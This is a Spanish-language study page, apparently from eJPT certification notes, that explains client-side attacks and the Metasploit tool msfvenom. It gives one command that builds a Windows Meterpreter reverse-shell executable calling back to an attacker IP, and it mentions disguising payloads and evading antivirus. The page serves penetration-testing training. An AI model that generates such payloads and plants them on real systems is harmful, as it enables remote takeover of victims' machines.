> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/metasploit-framework-msf/ataques-del-lado-del-cliente/payloads/generando-payloads-con-msfvenom.md).

# Generando payloads con Msfvenom

## 🧠 ¿Qué es un ataque del lado del cliente?

Un **ataque del lado del cliente** (client-side attack) es un vector de ataque que se basa en engañar a la víctima para que **ejecute un payload malicioso** en su propio sistema. Una vez ejecutado, este payload establece una conexión inversa hacia el atacante, permitiéndole tomar el control del sistema.

#### 🎭 Características clave:

* Se basa en **ingeniería social** para inducir a la víctima a ejecutar el payload.
* Usualmente se disfrazan como **documentos maliciosos** o archivos **.exe** falsos.
* Aprovechan **vulnerabilidades humanas**, no necesariamente fallos técnicos del sistema.
* Dado que el payload se guarda y ejecuta **en disco**, debe evadir los **antivirus (AV)**.

***

## 🛠️ ¿Qué es Msfvenom?

**Msfvenom** es una poderosa herramienta en línea de comandos que forma parte de Metasploit y permite generar, codificar y personalizar payloads para distintas plataformas, como Windows, Linux, Android, PHP, ASP, entre otras.

#### 🔧 Funcionalidades:

* Generación de payloads personalizados.
* Codificación de payloads para evadir detección por antivirus.
* Soporte para múltiples formatos de salida: `.exe`, `.elf`, `.apk`, `.php`, `.asp`, entre otros.
* Integración total con Metasploit para el manejo de sesiones (Meterpreter, shell, etc.).

#### 🧬 Origen:

Msfvenom combina dos herramientas antiguas:

* `msfpayload`: para crear payloads.
* `msfencode`: para codificarlos.

***

### 🎯 Ejemplo de uso

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f exe > shell.exe
```

Esto genera un archivo ejecutable `shell.exe` que, al ejecutarse en el sistema víctima, establecerá una conexión inversa hacia el atacante (IP 10.10.14.6 en el puerto 4444) usando una sesión **Meterpreter**.

> 📌 *Este archivo puede ser utilizado como parte de una campaña de ingeniería social o en combinación con otras técnicas de explotación.*
